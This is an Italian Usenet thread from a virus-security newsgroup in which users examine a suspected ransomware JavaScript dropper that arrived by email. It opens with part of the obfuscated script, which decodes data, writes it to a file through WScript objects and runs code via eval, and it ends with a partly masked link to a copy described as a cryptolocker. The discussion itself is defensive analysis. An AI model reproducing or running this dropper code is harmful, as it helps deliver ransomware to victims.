Sq[8319]=252;
Sq[-6592 + 6770]=253;
Sq[9632]=254;
Sq[160]=255;

var HFz=new Array();
for (var OPj=6938 - 6938; OPj < Tf0[JQu(QSc) + (function
Cn2(){return OXv9;}())]; OPj++) {
var EFq7=Tf0[Xu4 + IDg5(RVk) + Ir8](OPj);
if (EFq7 < (4 * 32))
{var ENo=EFq7;}
else
{var ENo=Sq[EFq7];}
HFz[(function Gk(){return RUn9;}()) + JVi](ENo);
};

return HFz;
};


function Ly(DHf1 /* k */)
{
var Pa7=new Array();

Pa7[128]=199;
Pa7[129'+''+']=252;
Pa7[130]=233;
Pa7[131]=226;
Pa7[132]=228;
Pa7[133]=224;
Pa7[134]=229;
Pa7[135]=231;
Pa7[136]=234;
Pa7[137]=235;
Pa7[138]=232;
Pa7[139]=239;
Pa7[140]=238;
Pa7[25 * 5 + 16]=236;
Pa7[142]=196;
Pa7[143]=197;
Pa7[2210 - 2066]=8219 - 8018;
Pa7[145]=230;
Pa7[7123 - 6977]=198;
Pa7[3078 - 2931]=244;
Pa7[148]=246;
Pa7[54 * 2 + 41]=-7451 + 7693;
Pa7[150]=251;
Pa7[151]=249;
Pa7[152]=255;
Pa7[73 * 2 + 7]=214;
Pa7[154]=220;
Pa7[-3787 + 3942]=162;
Pa7[857 - 701]=163;
Pa7[2435 - 2278]=7487 - 7322;
Pa7[-8338 + 8496]=1327 + 7032;
Pa7[159]=402;
Pa7[13 * 12 + 4]=225;
Pa7[161]=-7323 + 7560;
Pa7[162]=243;
Pa7[163]=250;
Pa7[164]=241;
Pa7[-7646 + 7811]=209;
Pa7[64 * 2 + 38]=1535 - 1365;
Pa7[167]=186;
Pa7[-307 + 475]=60 * 3 + 11;
Pa7[7758 - 7589]=945 * 9 + 471;
Pa7[170]=172;
Pa7[171]=189;
Pa7[172]=188;
Pa7[173]=15 * 10 + 11;
Pa7[-7814 + 7988]=171;
Pa7[175]=187;
Pa7[176]=17023 - 7406;
Pa7[177]=9618;
Pa7[178]=9619;
Pa7[179]=9474;
Pa7[8887 - 8707]=9508;
Pa7[18'+''+'1]=9569;
Pa7[182]=9570;
Pa7[183]=2474 * 3 + 2136;
Pa7[184]=9557;
Pa7[185]=17863 - 8292;
Pa7[186]=17177 - 7624;
Pa7[10143 - 9956]=3117 * 3 + 208;
Pa7[188]=9565;
Pa7[7026 - 6837]=9564;
Pa7[190]=9563;
Pa7[-6960 + 7151]=9488;
Pa7[192]=24 * 395 + 12;
Pa7[193]=9524;
Pa7[7489 - 7295]=11205 - 1689;
Pa7[195]=9172 + 328;
Pa7[196]=9472;
Pa7[197]=9532;
Pa7[198]=14788 - 5222;
Pa7[199]=3280 * 2 + 3007;
Pa7[200]=9562;
Pa7[-1245 + 1446]=9556;
Pa7[-6094 + 6296]=9577;
Pa7[4501 - 4298]=9574;
Pa7[-8356 + 8560]=16041 - 6473;
Pa7[205]=9552;
Pa7[206]=18878 - 9298;
Pa7[207]=9575;
Pa7[208]=9576;
Pa7[209]=16184 - 6612;
Pa7[29 * 7 + 7]=3391 + 6182;
Pa7[211]=9561;
Pa7[212]=12923 - 3363;
Pa7[213]=9554;
Pa7[214]=9555;
Pa7[215]=9579;
Pa7[4281 - 4065]=9578;
Pa7[217]=9496;
Pa7[78 * 2 + 62]=9484;
Pa7[219]=19023 - 9415;
Pa7[220]=9604;
Pa7[5 * 44 + 1]=9612;
Pa7[222]=9616;
Pa7[223]=2260 * 4 + 560;
Pa7[224]=945;
Pa7[225]=6228 - 6005;
Pa7[-4150 + 4376]=915;
Pa7[-3111 + 3338]=960;
Pa'+''+'7[28 * 8 + 4]=931;
Pa7[229]=-7943 + 8906;
Pa7[230]=181;
Pa7[-6447 + 6678]=964;
Pa7[-2571 + 2803]=934;
Pa7[233]=396 * 2 + 128;
Pa7[234]=937;
Pa7[235]=281 * 3 + 105;
Pa7[236]=8734;
Pa7[237]=25 * 38 + 16;
Pa7[238]=949;
Pa7[239]=8745;
Pa7[240]=-293 + 9094;
Pa7[89 * 2 + 63]=177;
Pa7[242]=8805;
Pa7[90 * 2 + 63]=8804;
Pa7[244]=8992;
Pa7[-2514 + 2759]=2543 * 3 + 1364;
Pa7[246]=247;
Pa7[247]=8776;
Pa7[36 * 6 + 32]=2 * 88;
Pa7[249]=8729;
Pa7[55 * 4 + 30]=183;
Pa7[251]=16189 - 7459;
Pa7[252]=8319;
Pa7[253]=178;
Pa7[254]=19363 - 9731;
Pa7[255]=160;

var Dq=new Array();
var Og="";
var ENo; var EFq7;
for (var OPj=1 * 0; OPj < DHf1[QSc + OXv9]; OPj++)
{
ENo=DHf1[OPj];
if (ENo < 128)
{EFq7=ENo;}
else
{EFq7=Pa7[ENo];}
Dq.push(String[Kt + Fd + XUw + Eo6](EFq7));
}

Og=Dq[RFj]("");

return Og;
};


function Vg8(Ec, DHf1 /* k */)
{
var WHy0=WScript[RJe4 + LFp + As3 + Up(Zu)](TYj+Cc0+Vw3(Wt6)+XOs +
Yv + Xf); WHy0[LOe3]=DAe;
'+''+' WHy0[Sm2 + Uq]=UMc /* k */;
WHy0[IDg]();
WHy0[Uf9 + RFl + (function In(){return LUg;}())](Ly(DHf1 /* k */));
WHy0[Hs2 + Sa0 + ETx9 + ZZc8](Ec, 2);

WHy0[KCh5 + TZa + RVy]();
};';

eval(aMSq4);
WScript.Quit(1);
Alex 4 Ago 2016 12:01
Skywalker Senior scriveva il 03/08/2016 :
> Sembra che Alex abbia detto :
>> Allego un probabile virus che è arrivato in formato compresso .zip
>>
>> Si tratta di un javascript.
>>
>> ATTENZIONE: LEGGETELO SOLO CON UN EDITOR DI TESTO, tipo notepad.
>>
>> Sembra qualcosa che sfrutta le vulnerabilità di Explorer.
>>
>> Io non riesco a capire con chi vorrebbe comunicare questo presunto virus.
>>
>> Bye
>> Alex
>>
>> ------------
>> VIRUS - LEGGERE SOLO CON NOTEPAD
>>
>
> Appena ho aperto il messaggio, Defender si è allarmato, nonostante sia solo
> testo!

Forse facevo meglio a lasciarlo codificato base64, come è arrivato. :-)
Bye
Alex

--
Alex

--- news://freenews.netfront.net/ - complaints: news@netfront.net ---
Alex 4 Ago 2016 12:06
Arne Saknussemm ha spiegato il 04/08/2016 :
>
> quella sotto è la versione parzialmente "deoffuscata" nel caso a
> qualcuno interessi; non credo si tratti di una vuln di IE quanto dello
> sfruttamento del motore di scripting di windows, dato che la prima cosa
> che lo script fa è caricare il codice in una variabile e subito dopo
> eseguirlo usando la "eval" posta in fondo allo script, per quanto poi
> riguarda il "cosa faccia", al momento non ho tempo per giocarci, ma se
> qualcuno volesse torturarlo ...
>

Chi scrive virus detesta che altri ne leggano il codice, evidentemente,
quindi lo aggroviglia più che gli è possibile.
A parte la competenza tecnica, ci vuole anche la pazienza di Giobbe per
decrittarlo.

Bye
Alex

--
Alex

--- news://freenews.netfront.net/ - complaints: news@netfront.net ---
John Doez 4 Ago 2016 15:05
On Tue, 02 Aug 2016 19:12:22 +0200, Alex wrote:

>
>Si tratta di un javascript.

Io ho associato tutte quelle *****herie al notepad.
Non c'è motivo per cui un .js debba essere lanciato dall'utente.
ObiWan 4 Ago 2016 15:40
:: On Tue, 02 Aug 2016 19:12:22 +0200
:: (it.comp.sicurezza.virus)
:: <nnqk9p$1k4l$1@adenine.netfront.net>
:: Alex <tommaso5ita@yahoo.it> wrote:

> VIRUS - LEGGERE SOLO CON NOTEPAD
>
>
> var aMSq4 = 'if
> (WScript.Path[\x22cha\x72At\x22](\x57Script.\x50ath.\x6cength-1)

potresti caricare l'originale qui

http://pastebin.com/

e postare l'URL ? Mica per altro ma vorrei dargli un'occhiatina
P/ero 8 Ago 2016 16:56
"ObiWan" [by "newsreader: Not Found"] on 04/08/16 15:40:31 (Italian Time) wrote:

> :: On Tue, 02 Aug 2016 19:12:22 +0200
> :: (it.comp.sicurezza.virus)
> :: <nnqk9p$1k4l$1@adenine.netfront.net>
> :: Alex <tommaso5ita@yahoo.it> wrote:

..._skipped!_
> potresti caricare l'originale qui

> http://pastebin.com/

> e postare l'URL ? Mica per altro ma vorrei dargli un'occhiatina

Guarda questo, è un cryptolocker:
http://wikisend.com ******* 166190/invoice_PwrYhB.txt

--
* b *
* y *
* Piero *
#v+
Se perdi la calma, non la ritrovi fra gli "Oggetti smarriti".
#v-

Links
Giochi online
Dizionario sinonimi
Leggi e codici
Ricette
Testi
Webmatica
Hosting gratis
   
 

Discussioni su virus e antivirus | Tutti i gruppi | it.comp.sicurezza.virus | Notizie e discussioni sicurezza virus | Sicurezza virus Mobile | Servizio di consultazione news.